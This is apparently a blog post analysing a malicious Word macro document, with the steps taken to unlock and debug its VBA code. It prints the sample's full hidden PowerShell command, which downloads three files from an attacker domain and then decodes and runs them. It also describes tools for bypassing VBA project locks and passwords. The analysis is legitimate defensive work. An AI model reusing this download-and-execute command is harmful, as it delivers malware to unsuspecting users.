Sample Download Source: beta.virusbay.io
File Type: Microsoft Word Document
File Format: .doc
VirusTotal Scrore: 32/62
cmd> olemeta.py <filename>
Document Macro Analysis:
cmd> olevba.py -a <filename>
Document_Open macro executes on opening document.
The first thing I was trying to access Macro. By default it was disabled, to enable it go to Files > Options > Trust Center > Macro Settings > Select Enable all macros and select checkbox Trust access to the VBA project object mode
Post enabling macro, I navigate to View > Macros > View Macros
There are macros in document.
I tried to step into Document_Open macro which executes on document open. But I got an error Project Locked and Project is unenviable.
To make it viewable, I downloaded tool EvilClippy. This tool create new copy of word document in same directory as your current document.
Now when I open document which is project viewable and open VBA Development tool by pressing F11 and tried to open macro code, I was getting Project Password prompt.
To remove/bypass this password, there is a VBA code, Git hub link
I am going to create a new module and paste this code there and run the macro unprotected
I started debugging macro code and found below code runs PowerShell command
PowerShell that written to location C:\Users\<profile>\AppData\Roaming\Temp\
PowerShell command that executes via command line.
powershell -windowstyle hidden -command Import-Module BitsTransfer; Start-BitsTransfer -Source http://neoneo-bg.site/hIeak.dat,http://neoneo-bg.site/geTask.dat,http://neoneo-bg.site/rTTj.dat -Destination \"$env:TEMP\vido.com\",\"$env:TEMP\sfera\",\"$env:TEMP\rTTj.com\"; Set-Location -Path \"$env:TEMP\"; certutil -decode sfera po15p; Start-Process vido.com -ArgumentList po15p
PowerShell connects to the below URLS and save files vido.com, rTTj.com and sfera to location C:\Users\<user>\AppData\Local\Temp
- http://neoneo-bg . site/hIeak.dat
- http://neoneo-bg . site/geTask.dat
- http://neoneo-bg . site/rTTj.dat
I tried to debug the PowerShell script but the URL is no more accessible. Sadly, I couldn’t download the files those gonna download by this script.
VirusTotal Score: 5/71
VirusTotal Score: 7/71
VirusTotal Score: 5/71
- On opening document, word macro executes PowerShell command.
- PowerShell command downloads file to Temp folder.
Thank you. Please post comments for suggestions.
Categories: Malware Analysis